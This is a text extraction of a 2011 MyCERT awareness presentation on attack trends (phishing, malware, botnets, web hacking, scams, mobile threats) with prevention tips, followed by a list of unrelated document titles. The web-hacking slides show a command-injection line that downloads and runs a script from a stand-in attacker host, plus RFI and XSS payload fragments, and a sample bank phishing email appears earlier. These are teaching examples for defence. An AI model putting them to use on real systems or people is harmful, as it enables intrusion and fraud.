SEMINAR KESELAMATAN ICT 2011 KEMENTERIAN · PDF fileBangladesh Oman Qatar Pakistan Egypt Syria...

Ministry of Science,Technology & Innovation

Hacking AnatomySalahudin Wan Khairuzzaman

SEMINAR KESELAMATAN ICT

2011 KEMENTERIAN

KESIHATAN MALAYSIA

24/3/2011

Salahudin Wan Khairuzzaman GCIH, CEH, ENSA

Intrusion Analyst

Malaysia Computer Emergency Response Team (MyCERT)

Malware Research

Cyber Early Warning

LebahNetAdvisory and

Alerts

Securing Our Cyberspace

Emerging Threats Threats

Visualization

MyCERT Statistics2010 and Early 2011

2010 and Early 2011

Cyber999™

MyCERT – Emergency Services

Incidents Handled in 2010Incidents Handled in 2010

Cyber999™

Incidents Handled in 2011(JanIncidents Handled in 2011(Jan--Feb)Feb)

Spam Emails in 2010Spam Emails in 2010

Cyber999™

Spam Emails in 2011(JanSpam Emails in 2011(Jan--Feb)Feb)

Cyber999™

Botnet drones & Malware Infection in 2010Botnet drones & Malware Infection in 2010

Cyber999™

Botnet drones & Malware Infection in 2010(JanBotnet drones & Malware Infection in 2010(Jan--Feb)Feb)

Cyber999™

Honeynet Project Incidents in 2010Honeynet Project Incidents in 2010

Cyber999™

Honeynet Project Incidents in 2011(JanHoneynet Project Incidents in 2011(Jan--Feb)Feb)

Technical and Global

Co-ordination

Technical Co-ordination

ISPsCyber

National Cooperation

VendorsLaw Enforcement, Authorities

Regulators

ISPsCyber SecurityExperts

DELLDELLIBMIBM

Technical Coordination Centre

International Collaboration

European Government CSIRTs Group

European Network and Information Security Agency(ENISA)

MyCERT is an SC member

Organization of American States (OAS)

Forum of Incident Response Teams

(ENISA)

“OIC CYBER EMERGENCY RESPONSE TEAM”

Pakistan

Tunisia

Malaysia

Indonesia

Nigeria

Morocco

Brunei

Bahrain

Bangladesh

EgyptPakistanQatar

Syria Kuwait

Jordan

OIC-CERT Task Force Member

Organization of Islamic Countries Computer Emergency Response Teams

States (OAS) CERT

Turkey

Current Trend and Threats

Overview

� Phishing

�Malware

� Botnet

�Web Hacking

� Scam

�Client Side Attack

�Mobile Devices

What threat is this?

More examples..

Phishing

� Phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication[source: wikipedia]

� Still works today

� Targeting favourite banks in Malaysia / international

� Uses long URL that masquerading the original website

Phishing Methodology

Malicious

Hackers

INTERNET

Victim

Website

Phishing

That’s old phishing attack…..Let see how hackers redefine their tactics

Same Phishing Methodology

Malicious

Hackers

INTERNET

Victim

Website

We are hereby notifying you that we've recently suffered a DDos-Attack on one of

our's Online Banking server. For security reasons you must complete the next steps

to verify the integrity of your Maybank account. If you fail to complete the

verification in the next 24 hours your account will be suspended.

Here's how to get started:

1. Log in to Maybank online account (click here).

2. You must request for TAC via Maybank online banking - your TAC

will be sent via SMS to the mobile phone number you registered.

https://www.maybank2u.com.my/mbb/m2u/common/M2ULogin.do

Phishing Redefined

(you can find the "Request a TAC" button in the Utilities menu of

your account)

3. Logout from your account and close the browser.

4. When you have received the TAC (Transaction Authorization Code) on

your mobile phone, go to our secured verification server and

submit the requested information (Username, password and TAC).

to go on our secured server. (click here)

5. Please allow 48 hours for processing.

Please comply and thanks for understanding.

***This is an automated message, please do not reply***

http://static-217-133-89-90.clienti.tiscali.it//

Phishing Website –Username, Password & Transaction Authorization Code

Phishing

Does it really works?

Phishing

Prevention

Initiative from provider itself..

Phishing : Prevention

� Do not respond to e-mails requesting for your personal information

� Do not open attachments or download files

� Do not click on links provided in e-mails.

� DontPhishMe add-ons in Mozilla Firefox and Chrome

� https://addons.mozilla.org/en-US/firefox/addon/dontphishme/

� Netcraft Anti-Phishing toolbar� http://toolbar.netcraft.com/

� Report to MyCERT by forwarding the email to mycert@mycert.org.my

DontPhishMe

� Below is the list of supported online banking websites:

o * Maybank2u

o * Cimbclicks

o * Public Bank

o * Bank Rakyat

o * Bank Islam

o * HSBC

o * EON Bank

o * UOB

o * AMBank

o * OCBC

o * RHB

o * Citibank

o * Standard Chartered Bank

o * Al Rajhi Bank

o * Affin Bank

DontPhishMe screenshots

Malware

�A computer program created with malicious intents.

� It performs malicious tasks:� Stealing your identity

� Key logging

Disrupt system

� Disrupt system

� Damage data

� Attack other computers

Malware

� We can get infected by malware from almost everywhere:

� Web (drive by download, web exploitation, flash)

� Fake antivirus

� Email (email attachment, links)

� Files (pdf, doc, jpeg, etc.etc [file exploitation])

� Video/Mp3 (fake codec, file exploitation)

� Portable hardisk

� Errr..your USB storage?

Malware

�Unpatched systems or systems with vulnerable applications will easily become target to malware.

�Malicious software includes� Trojan horse

� Virus

� Worms

A computer worm is a self-replicating malware computer program.

A Trojan horse, is non-self-replicating malware that appears to perform a desirable function for the user but instead facilitates unauthorized access to the user's computer system

A computer virus is a computer program that can copy itself and infect a computer

Malware: What MyCERT Observed?

� MyCERT have been collected more than 25K unique samples.

� Most of it are positive with detection from antivirus software.

� Using honeypot concept (low interaction) for collecting malware.

� Most likely coming from host which infected by sort of malware.

� Malware is normally distributed by IRC, FTP and HTTP

Threatexpert geographic

VirusTotal statistics

Malware: Scenario (Conficker)

Malware : Conficker : What MyCERT Observed?

Top Country

Top .my Domain Requested

Current trends

� Targeted attacks

o Stuxnet is a Windows computer worm discovered in July 2010 that targets industrial software and equipment

o spread using infected removable drives such as

o spread using infected removable drives such as USB flash drives

o designed to target only Siemens Supervisory Control And Data Acquisition (SCADA) systems

o Targeting 5 Iranian organizations - probable target widely suspected to be uranium enrichment infrastructure in Iran.

Prevention

Malware : Prevention

� Patch.. Patch.. Patch.. and Patch (OS & Applications)

� Make sure Antivirus installed and up-to-date

� Stay away from illegal/questionable sites

� Be careful with mail attachments!

� Be careful with ‘autorun’ thumbdrive

� Report to MyCERT : mycert@mycert.org.my

Botnet

� Botnet is collection of compromised computers (called Zombie computers) running software, usually installed via worms, Trojan horses, or backdoors, under a common command-and-control (C&C) infrastructure.

�Use to perform DDoS, Automated hacking,

�Use to perform DDoS, Automated hacking, Spamming, etc..etc..

Botnet : Scenario

1. Botnet operator sends out viruses or worms• infect ordinary users [trojan application is the

2. The bot on the infected PC logs into an IRC server

• Server is known as the command-and-control server

3. Spammer gets access to botnet from operator

4. Spammer sends instructions to the infected PCs

5. Infected PCs send out spam messages

Botnet : DDoS

Web Hacking

Web Security Threats

CODE INJECTIONlala.php?Id=1&cmd=uname –a || wget hax0r.net/ipwn3du.sh && ./ipwn3du.sh &&

rm ipwn3du.sh

Web Defacement

Web defacement is an attack on a website that changes

the visual appearance of the site.

These are typically the work of a system cracker, who

break into a web server and replace the hosted website

with on of their own.

A message is often left on the webpage along with a shout

out to his or her friends.

Web Hacking

When attacker successfully attack a website, they

oChange of view the disclosed information on the

oChange account information , edit the database.

oRemove the entire websites , drop database etc

oDeface the web pages

oMany more..

Web Hacking

�Most Common methods:� RFI

� [ex. drop sites: =http://www.example/malicious-code.txt??]

� SQL Injection� Union

� Select

� %20

� %27

� XSS - enables malicious attackers to inject client-side script into web pages viewed by other users� <SCRIPT>alert("XSS")</SCRIPT

� This is what we see:

Remote File Inclusion + Steganography

� This is what attacker have

Prevention

Web Hacking : Prevention

� Secure coding practice� http://www.mycert.org.my/en/resources/web_security/main/main/detail/573/index.html

� Secure configurations

� Modified php.ini

� allow_url_include=off

� register_globals=off

� 3rd party applications (GreenSQL, PHP-IDS, modSecurity, etc2)

� Web Application Firewall (WAF)

� Log analysis (time to time)

� By having proper network design/firewall rules, we can reduce the threat as well:

o DMZ (web server) are not allow to connect to IRC protocol

o DMZ (web server) are not allow to establish

Prevention : Network Design

o DMZ (web server) are not allow to establish connection to unknown sites/ftp server

o DMZ (web server) are not allow to establish connection to search engine

o Proxi’ed web server?

� Dear Sir/Madam, Congratulations! We are pleased to announce you as one of the 3 lucky winners in the FLASH MEGA LOTTERY draw held today. All 3 winning addresses were randomly selected from a batch of 5,000,000 international

selected from a batch of 5,000,000 international emails. Your email address emerged alongside to others as a 3rd category winner in this month's draw. Consequently, you have therefore been approved for a total pay out of $1,950,000.00 Dollars (One Million Nine Hundred and Fifty Thousand United State Dollars) only.

� May related to phishing

� Nigerian or Russian Scam

� Normally through email with title “From the desk of Mr [name]” or “Your Assistance is needed”

� Email-Hijacking / Friends Scams

� Purchasing goods and online.

� Lottery scam.

� Pet scam.

� Fake job offer.

� Etc etc.. You name it!

Prevention

� Do not expose your 16 digits card number

� Customer Card ID Number (CID or CVV2 number)

� Expiry Date

� This scam is normally through

Prevention

� This scam is normally through

phone.

� Google out your full name to protect your information.

� Do not respond to anonymous E-mail

� Bill Gates don’t give free ipod through the internet.

Prevention

internet.

� Make sure you follow up

on any process or procedures.

Prevention

� http://www.hoax-slayer.com/

Hoax-Slayer is dedicated to debunking email hoaxes, thwarting Internet scammers, combating spam, and educating web users about email and Internet security issues

Internet security issues

What’s now/next?

Client Side Attack

�Target vulnerabilities in client applications that interact with a malicious server or process malicious data.

Client Side Attack

� Common Target� Browser (IE, Firefox, Chrome, Safari)

� PDF Reader (Adobe Acrobat, Foxit)

� Flash Player

� Multimedia Plugin (Java, Quicktime, ActiveX)

� Microsoft Office Apps (Excel, PowerPoint)

Client Side Attack

� Used in ‘Targeted Attack’

o Scenario: Receive file with attachment from boss

� Normally used current propaganda to conduct social engineering:

o US Presidential Election

o Tibetan Movement

o Pharmacy spam

o Swine Flu

o Michael Jackson

Client Side Attack : Acrobat Reader (1)

Client Side Attack : Acrobat Reader (2)

Client Side Attack : Advisories 2010

� MA-261.122010 : MyCERT Alert - Critical Vulnerability in Microsoft Internet Explorer

� MA-257.112010 :Multiple Critical Vulnerabilities in Adobe Reader

� MA-256.112010 : Critical Vulnerability in Microsoft Internet Explorer

� MA-255.102010 : MyCERT Alert - Critical Vulnerability in Adobe Flash Player

� MA-254.102010 : MyCERT Alert - Critical vulnerability in Mozilla Firefox

� MA-253.102010 : MyCERT Alert - Critical Vulnerability in Adobe Shockwave Player

� MA-252.102010 : MyCERT Alert - Multiple Critical Vulnerabilities in Oracle Java SE and Java for Business

� MA-250.092010 : MyCERT Alert - Critical Vulnerability in Adobe Flash Player

� MA-249.092010 : MyCERT Alert - Multiple Critical Vulnerabilities in Adobe Acrobat and Reader

� MA-246.082010 : MyCERT Alert - Multiple Critical Vulnerabilities in Adobe Shockwave Player

� MA-245.082010 : MyCERT Alert - Multiple Critical Vulnerabilities in Adobe Acrobat and Reader

� MA-243.082010 : MyCERT Alert - Multiple Critical Vulnerabilities in Adobe Flash Player

� MA-242.082010 : MyCERT Alert - Latest Patch for Microsoft Vulnerabilities (August 2010)

� MA-234.062010: MyCERT Alert -Critical Vulnerabilities in Adobe Flash Player, Adobe Reader and Acrobat

� MA-232.052010: MyCERT Alert -Multiple Critical Vulnerabilities in Adobe Shockwave Player

� MA-230.052010: MyCERT Alert - Critical Vulnerability in Safari Web Browser

� MA-229.042010: MyCERT Advisory -Vulnerability in Microsoft Sharepoint Could Allow Elevation of Privilege

� MA-226.042010: MyCERT Alert - Multiple Critical Vulnerability in Adobe Acrobat and Reader

� MA-225.042010: MyCERT Alert - Oracle JRE Java Platform SE and Java Deployment Toolkit Plugins Code Execution Vulnerabilities

� MA-221.032010 : MyCERT Alert – Critical Vulnerability in Microsoft Internet Explorer

� MA-218.032010 : MyCERT Alert - Microsoft Windows Help File Code Execution Vulnerability Within Internet Explorer via VBScript

� MA-217.022010:MyCERT Alert - Critical Vulnerability in Adobe Download Manager

� MA-216.022010: MyCERT Alert - Critical Vulnerability in Adobe Acrobat and Adobe Reader

� MA-214.022010: MyCERT Alert - Information disclosures vulnerabilities in Internet Explorer

� MA-212.012010: MyCERT Alert - Google Chrome Multiple Critical Vulnerabilities

Prevention

Client Side Attack : Prevention

� Make sure Antivirus installed and up-to-date

� Be careful with mail attachments and URL!

� Stay away from questionable sites

� Use extra protection :) (Firewall, F-Secure Exploit

� Use extra protection :) (Firewall, F-Secure Exploit Shield, Google Safe Browsing API (about:config))

Google safe browsing API

Mobile Devices

�Target mobile phone with specific Operating System

�Very recent

�Attacking method:� SMS

� MMS

� Attachment

� Bluetooth

� Warez/free applications downloaded (not official)

Mobile Devices : Transmitter.C (malware)

Mobile Malware

Skull.D Commwarrior BlankfontDoomboot

Mobile Malware (cont’d)

Mobile Devices

�Affected Product� iPhone (Safari browser)

� Symbian (SMS, MMS, Warez, File)

� Windows Mobile [HTC] (Bluetooth, Warez)

� BlackBerry (Attachment)

� Android devices

Mobile Devices : Advisories

MA-177.072009: MyCERT Alert - 0day in HTC (Windows Mobile) OBEX FTP Service - Directory TraversalMA-176.072009: MyCERT Alert - 0day in Symbian S60 (Nokia) Firmware Media Codecs - Multiple Memory Corruption VulnerabilitiesMA-174.072009: MyCERT Alert - Transmitter.C Mobile Malware AdvisoryMA-193.092009: MyCERT Alert - Critical Vulnerability in iPhone and iPod Touch Operating SystemMA-213.022010: MyCERT Alert - Latest Security Update for iPhone OS and iPod Touch (February 2010)MA-274.032011 : MyCERT Alert - Critical Vulnerability in Webkit Browser Engine for BlackBerry

Prevention

Client Side Attack : Prevention

� Patch.. Patch.. Patch.. and Patch (if available)

� Do not open questionable SMS, MMS or files

� Do not browse to unknown websites received via SMS or MMS from known or unknown person

� Do not download and install unknown or untrusted third party application that is uploaded into the

third party application that is uploaded into the website and forum

� Do not to accept pairing or connection requests from unknown sources

� It is recommended to use Antivirus

Google search tips

� “keywords” filetype:doc

� “keywords” site:my

� “keywords” inurl:google.com

� “keywords” inurl:phpmyadmin

� Phrase search “ “

� Calculator

� Currency Converter

� word1 OR word2 --finds pages that include either word

� Word1 AND word2 --finds pages that include both word

� Term you want to exclude (-) (e.g word1 -word2)

� Term you want to include (+) (e.g word1 +word2)

Conclusion

Security isOUR

Small Issues

BIG Problem

OURResponsibility

Mode of Incident Referrals

1. Email� cyber999@cybersecurity.my� mycert@mycert.org.my

2. Phone� +603 8992 6969� +1300-88-2999

3. Fax� +603 8945 3442

� +603 8945 3442

4. SMS� +6019 281 3801

5. Mobile (24x7)� +6019 266 5850

6. Online – http://www.mycert.org.my

1. Office Hours – MYT 0830 - 1730

THANK YOU

salahudin@cybersecurity.my

cyber999@cybersecurity.my

mycert@mycert.org.my

forhttp://www.cybersecurity.my

http://www.mycert.org.my

http://www.esecurity.org.my

Corporate website

Technical website

Our Websites and emails

cyber999@cybersecurity.my → for incidence reporting

info@cybersecurity.my → for general inquiries

http://www.esecurity.org.myAwareness Portal

http://cnii.cybersecurity.my for

Our Corporate Website:

SEMINAR KESELAMATAN ICT 2011 KEMENTERIAN · PDF fileBangladesh Oman Qatar Pakistan Egypt Syria...

Documents

Transcript of SEMINAR KESELAMATAN ICT 2011 KEMENTERIAN · PDF fileBangladesh Oman Qatar Pakistan Egypt Syria...

Egypt Mapa - Czech

Tutorial 5 Hari Belajar Hacking Dari Nol Oleh Wahana Komputer

Hurghada, Egypt Executive Board Report - aiesec-alumni.org · o AA AP Congress 2018 in Kuala Lumpur, Malaysia . Through the above listed activities, we are continuously working towards

OMAN EID MUBARAK 2016 - cdn.extrastores.com

PENGUMUMAN HASIL SELEKSI BERKAS BEASISWA IsDB … · 2017. 10. 14. · 1 asep dadan suganda, m.sh perbankan syariah university of malaya malaysia 2 oman farhurohman, m.pd phd upsi

INTEGRASI NILAI RELIGIUS MELALUI PENDEKATAN SETS UNTUK MENINGKATKAN HASIL BELAJAR ...repository.syekhnurjati.ac.id/1595/1/OMAN ABDUL RAHMAN... · 2017-04-04 · Hasil belajar siswa

Embassy of Arab Republic of Egypt Economic and · PDF fileEmbassy of Arab Republic of Egypt Economic and Commercial Office Kuala Lumpur Tel : + 603-4257 3166 Fax : + 603-4252 4853

OTI, MALAYSIA · 2019-08-07 · GE(POWER) PETROLEUM DEVELOPMENT OF OMAN U-SONIX INTERNATIONAL FZ-LLC T1-9F 1C, AC 01, AL Hamra Industrial Zone FZ, RAK - Ras Al-Khaimah United Arab

PARLIMEN KETIGA BELAS PENGGAL KEEMPAT … · termasuklah Kompleks Dewan Kuliah Pusat bernilai RM2050 juta di bawah Rancangan ... Timor Leste, Oman, Bangladesh dan Jordan.

Belajar Hacking / Attack - onnocenter.or.idonnocenter.or.id/pustaka/docs/XIT/XIT-belajar-hacking.pdf · “seseorang yang masuk ke sistem orang lain, biasanya di jaringan komputer,

Dikemaskini pada 18 Januari 2021 SEKTOR PENGURUSAN … · 2021. 1. 19. · • Kerja-kerja hacking yang melibatkan bunyi bising berterusan tidak ... masa ketibaan di premis dalam

2007 Aktc Egypt Azhar Park Broshure

· japan lesotho africa khartoum korea kuala lumpur mexico ch kelley.wc dunlap ... h allan-r y h berry p landry-mr caggiano-wa dettori- columbia egypt england-uk germany greece guam

Panduan Hacking Website dengan Kali Linux · Penulis sering melihat di internet banyaknya berita tentang ... Data yang tersedia adalah rakyat ... Buku ini adalah buku yang ke‐2

ra Bonda kc (Siti Hajar Mohd. Zaki) (f) ~e.--:J adi · Tema Kegigihan dan ... Contoh: setem duko; surot kehidupon; album pengo/oman. ... Kita hendaklah bersifat pemaaf terhadap orang

PANDUAN PERLINDUNGAN TERHADAP SERANGAN OLEH … filekerahsiaan sesuatu maklumat adalah bukan tanggung jawab atau tugas mangsa; ... (hacking) yang popular. Lebih-lebih lagi penggunaan

Tutorial Hacking Untuk Newbie

SUGGESTED ITINERARY - Orient Escape 2020 Oman … · Overnight Istanbul Day 2 Check out. Istanbul city tour. Hagia Sophia (Photostop), Blue Mosque, Topkapi Palace - once home of the

CADANGAN KERJA-KERJA NAIKTARAF & BAIKPULIH … projek... · Kerja Excavation, Hacking & Rebar Pile Cap Link Bridge (Kawasan Parlimen) CADANGAN KERJA-KERJA NAIKTARAF & BAIKPULIH BANGUNAN

Majis (oman)